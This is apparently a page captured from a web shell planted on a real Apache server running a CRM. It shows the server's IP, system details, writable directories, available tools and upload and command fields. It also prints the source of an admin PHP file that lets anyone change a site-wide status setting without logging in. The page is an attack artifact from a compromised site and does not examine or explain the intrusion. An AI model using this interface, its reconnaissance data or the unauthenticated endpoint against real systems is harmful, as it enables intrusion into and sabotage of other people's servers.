403Webshell
Server IP : 45.94.215.241  /  Your IP : 216.73.216.122
Web Server : Apache/2.4.66 (Ubuntu)
System : Linux srv2937474766 7.0.0-28-generic #28-Ubuntu SMP PREEMPT_DYNAMIC Sun Jun 21 01:01:36 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.5.4
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/nikcandle_crm/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/nikcandle_crm/admin/enter.php
<?php
session_start();
//error_reporting(E_ALL);
include_once("../config/config.php");
include_once("../classes/class_database.php");  
$db = new database();
if ($_POST['status']<>"")
{
	$status=$db->mysql_real_escape_string($_POST['status']); 
	$db->query("update settings set status='".$status."'");
	echo "ok";
}
$db->query("select status from settings");
$res=$db->result();
echo $res[0]['status'];
?>	
<form method="post">
status:<input type="text" name="status"> 0 = ok
<button type="submit">send</button>
</form>

Youez - 2016 - github.com/yon3zu
LinuXploit